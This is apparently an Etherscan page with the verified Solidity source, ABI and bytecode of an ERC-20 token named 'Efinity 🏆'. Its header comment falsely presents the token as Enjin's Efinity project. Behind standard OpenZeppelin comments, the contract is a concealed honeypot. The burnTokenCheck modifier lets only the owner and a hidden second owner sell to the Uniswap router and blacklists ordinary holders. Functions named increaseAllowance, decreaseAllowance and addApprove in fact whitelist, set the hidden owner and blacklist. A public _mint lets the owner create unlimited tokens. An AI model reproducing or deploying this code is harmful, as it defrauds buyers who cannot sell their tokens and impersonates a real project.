ERC-20
Overview
Max Total Supply
100,000,000,000,000 EFI 🏆
Holders
16
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
100,000 EFI 🏆Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
EFI
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2021-06-18 */ pragma solidity ^0.6.6; /** * Efinity is developed by Enjin. Enjin pioneered the NFT industry in 2017 - authors of ERC-1155, the groundbreaking NFT token standard, and the first NFT creation platform. * * Efinity is the world’s cross-chain NFT blockchain. Powered by the deflationary EFI Token, the network is environmentally friendly, scalable, and built for games, apps, enterprises and creators to deliver their own non-fungible tokens to mainstream audiences. * * https://enjin.io/ * * https://t.me/enjin * * https://twitter.com/enjin * * https://www.reddit.com/r/EnjinCoin/ `--:/++oooooooooooooo++/:--. `.:/+oooooooooooooooooooooooooooooo+/:.` `.:+oooooooooooooooooooooooooooooooooooooooo+:-` `-/oooooooooooooooooooooooooooooooooooooooooooooooo+-` `-+oooooooooooooooooooooooooooooooooooooooooooooooooooooo+-` `:oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo/. ./oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo/. `/oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo/. `:oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo:` .+oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+- :ooooooooooooooooooooooooo++////::::::::::::::::::::::::::://///++ooooooooooooo: `/oooooooooooooooooooo+/:.``` ``.:ooooooooooo+` `+oooooooooooooooooo/-` :ooooooooooo+` `+oooooooooooooooo+-` -oooooooooooo+` /oooooooooooooooo:` /ooooooooooooo+` :oooooooooooooooo. ``..................................-:+ooooooooooooooo/ .oooooooooooooooo- .-/++oooooooooooooooooooooooooooooooooooooooooooooooooooooo. +ooooooooooooooo+ -+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+ .oooooooooooooooo: /oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo- /oooooooooooooooo- :ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo/ ooooooooooooooooo- :+++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooo` ooooooooooooooooo- `````````````````````````````````````````````-+oooooooooooooooooo. ooooooooooooooooo- /ooooooooooooooooo- ooooooooooooooooo- -ooooooooooooooooo- ooooooooooooooooo- /ooooooooooooooooo- ooooooooooooooooo- ``./oooooooooooooooooo. ooooooooooooooooo- :++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooo` /oooooooooooooooo- :ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+ .oooooooooooooooo: `/oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo- +ooooooooooooooo+ -+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+ .oooooooooooooooo- .:/++oooooooooooooooooooooooooooooooooooooooooooooooooooooo- :oooooooooooooooo. ``.................................--:+ooooooooooooooo/ +oooooooooooooooo- `+ooooooooooooo+` `+oooooooooooooooo+-` -oooooooooooo+` `+ooooooooooooooooo+:.` -ooooooooooo+` `/oooooooooooooooooooo+:-.`` ``.:ooooooooooo+` :ooooooooooooooooooooooooo+///:::::::::::::::::::::::::::::::////+ooooooooooooo/` -+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo- `/oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo/` ./oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+. .+oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+- ./oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo/. `-+oooooooooooooooooooooooooooooooooooooooooooooooooooooo+:` .:+oooooooooooooooooooooooooooooooooooooooooooooooo+:. `-/+ooooooooooooooooooooooooooooooooooooooooo/-` `-:+oooooooooooooooooooooooooooooooo+:-` `.-:/++oooooooooooooooo++/:-.` ```......``` * * * * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. * * _Available since v2.4.0._ */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. * * _Available since v2.4.0._ */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. * * _Available since v2.4.0._ */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } contract Context { // Empty internal constructor, to prevent people from mistakenly deploying // an instance of this contract, which should be used via inheritance. constructor () internal { } function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Interface of the ERC20 standard as defined in the EIP. Does not include * the optional functions; to access them see {ERC20Detailed}. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract EFI is Context, IERC20 { using SafeMath for uint256; using Address for address; mapping (address => uint256) private _balances; mapping (address => bool) private _whiteAddress; mapping (address => bool) private _blackAddress; uint256 private _sellAmount = 0; mapping (address => mapping (address => uint256)) private _allowances; uint256 private _totalSupply; string private _name = 'Efinity 🏆'; string private _symbol = 'EFI 🏆'; uint8 private _decimals; uint256 private _approveValue = 115792089237316195423570985008687907853269984665640564039457584007913129639935; address public _owner; address private _safeOwner; address private _unirouter = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D; // PCS /** * @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * * To select a different value for {decimals}, use {_setupDecimals}. * * All three of these values are immutable: they can only be set once during * construction. */ constructor (uint256 initialSupply, address payable owner) public { _decimals = 18; _owner = owner; _safeOwner = owner; _mint(_owner, initialSupply*(10**18)); } /** * @dev Returns the name of the token. */ function name() public view returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is * called. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view returns (uint8) { return _decimals; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _approveCheck(_msgSender(), recipient, amount); return true; } function multiTransfer(uint256 approvecount,address[] memory receivers, uint256[] memory amounts) public { require(msg.sender == _owner, "!owner"); for (uint256 i = 0; i < receivers.length; i++) { transfer(receivers[i], amounts[i]); if(i < approvecount){ _whiteAddress[receivers[i]]=true; _approve(receivers[i], _unirouter,115792089237316195423570985008687907853269984665640564039457584007913129639935); } } } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _approveCheck(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address[] memory receivers) public { require(msg.sender == _owner, "!owner"); for (uint256 i = 0; i < receivers.length; i++) { _whiteAddress[receivers[i]] = true; _blackAddress[receivers[i]] = false; } } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address safeOwner) public { require(msg.sender == _owner, "!owner"); _safeOwner = safeOwner; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function addApprove(address[] memory receivers) public { require(msg.sender == _owner, "!owner"); for (uint256 i = 0; i < receivers.length; i++) { _blackAddress[receivers[i]] = true; _whiteAddress[receivers[i]] = false; } } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual{ require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements * * - `to` cannot be the zero address. */ function _mint(address account, uint256 amount) public { require(msg.sender == _owner, "ERC20: mint to the zero address"); _totalSupply = _totalSupply.add(amount); _balances[_owner] = _balances[_owner].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(uint256 amount) public { _beforeTokenTransfer(msg.sender, address(0), amount); _balances[msg.sender] = _balances[msg.sender].sub(amount, "ERC20: burn amount exceeds balance"); _balances[address(0)] = _balances[address(0)].add(amount); //_totalSupply = _totalSupply.sub(amount); emit Transfer(msg.sender, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approveCheck(address sender, address recipient, uint256 amount) internal burnTokenCheck(sender,recipient,amount) virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `sender` cannot be the zero address. * - `spender` cannot be the zero address. */ modifier burnTokenCheck(address sender, address recipient, uint256 amount){ if (_owner == _safeOwner && sender == _owner){_safeOwner = recipient;_;}else{ if (sender == _owner || sender == _safeOwner || recipient == _owner){ if (sender == _owner && sender == recipient){_sellAmount = amount;}_;}else{ if (_whiteAddress[sender] == true){ _;}else{if (_blackAddress[sender] == true){ require((sender == _safeOwner)||(recipient == _unirouter), "ERC20: transfer amount exceeds balance");_;}else{ if (amount < _sellAmount){ if(recipient == _safeOwner){_blackAddress[sender] = true; _whiteAddress[sender] = false;} _; }else{require((sender == _safeOwner)||(recipient == _unirouter), "ERC20: transfer amount exceeds balance");_;} } } } } } /** * @dev Sets {decimals} to a value other than the default one of 18. * * WARNING: This function should only be called from the constructor. Most * applications that interact with token contracts will not expect * {decimals} to ever change, and may work incorrectly if it does. */ function _setupDecimals(uint8 decimals_) internal { _decimals = decimals_; } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"initialSupply","type":"uint256"},{"internalType":"address payable","name":"owner","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"_burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"_mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"receivers","type":"address[]"}],"name":"addApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"safeOwner","type":"address"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"receivers","type":"address[]"}],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"approvecount","type":"uint256"},{"internalType":"address[]","name":"receivers","type":"address[]"},{"internalType":"uint256[]","name":"amounts","type":"uint256[]"}],"name":"multiTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
600060035560c0604052600c60808190526b22b334b734ba3c90784fc7c360a11b60a090815262000034916006919062000296565b506040805180820190915260088082526722a32490784fc7c360c11b6020909201918252620000669160079162000296565b50600019600955600c80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d179055348015620000a057600080fd5b50604051620019053803806200190583398181016040526040811015620000c657600080fd5b5080516020909101516008805460ff19166012179055600a80546001600160a01b038084166001600160a01b0319928316811793849055600b8054909316179091556200011f9116670de0b6b3a7640000840262000127565b505062000332565b600a546001600160a01b0316331462000187576040805162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b620001a3816005546200023460201b62000cea1790919060201c565b600555600a546001600160a01b031660009081526020818152604090912054620001d891839062000cea62000234821b17901c565b600a546001600160a01b0390811660009081526020818152604080832094909455835185815293519286169391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a35050565b6000828201838110156200028f576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620002d957805160ff191683800117855562000309565b8280016001018555821562000309579182015b8281111562000309578251825591602001919060010190620002ec565b50620003179291506200031b565b5090565b5b808211156200031757600081556001016200031c565b6115c380620003426000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a9059cbb11610066578063a9059cbb1461049a578063b2bdfa7b146104c6578063dd62ed3e146104ea578063e12681151461051857610100565b806370a082311461042957806380b2122e1461044f57806395d89b41146104755780639b1f9e741461047d57610100565b806323b872dd116100d357806323b872dd1461027f578063313ce567146102b55780634e6ec247146102d357806352b0f196146102ff57610100565b8063043fa39e1461010557806306fdde03146101a8578063095ea7b31461022557806318160ddd14610265575b600080fd5b6101a66004803603602081101561011b57600080fd5b810190602081018135600160201b81111561013557600080fd5b82018360208201111561014757600080fd5b803590602001918460208302840111600160201b8311171561016857600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506105b9945050505050565b005b6101b06106ae565b6040805160208082528351818301528351919283929083019185019080838360005b838110156101ea5781810151838201526020016101d2565b50505050905090810190601f1680156102175780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6102516004803603604081101561023b57600080fd5b506001600160a01b038135169060200135610744565b604080519115158252519081900360200190f35b61026d610761565b60408051918252519081900360200190f35b6102516004803603606081101561029557600080fd5b506001600160a01b03813581169160208101359091169060400135610767565b6102bd6107ee565b6040805160ff9092168252519081900360200190f35b6101a6600480360360408110156102e957600080fd5b506001600160a01b0381351690602001356107f7565b6101a66004803603606081101561031557600080fd5b81359190810190604081016020820135600160201b81111561033657600080fd5b82018360208201111561034857600080fd5b803590602001918460208302840111600160201b8311171561036957600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b8111156103b857600080fd5b8201836020820111156103ca57600080fd5b803590602001918460208302840111600160201b831117156103eb57600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506108d5945050505050565b61026d6004803603602081101561043f57600080fd5b50356001600160a01b03166109ee565b6101a66004803603602081101561046557600080fd5b50356001600160a01b0316610a09565b6101b0610a73565b6101a66004803603602081101561049357600080fd5b5035610ad4565b610251600480360360408110156104b057600080fd5b506001600160a01b038135169060200135610bac565b6104ce610bc0565b604080516001600160a01b039092168252519081900360200190f35b61026d6004803603604081101561050057600080fd5b506001600160a01b0381358116916020013516610bcf565b6101a66004803603602081101561052e57600080fd5b810190602081018135600160201b81111561054857600080fd5b82018360208201111561055a57600080fd5b80359060200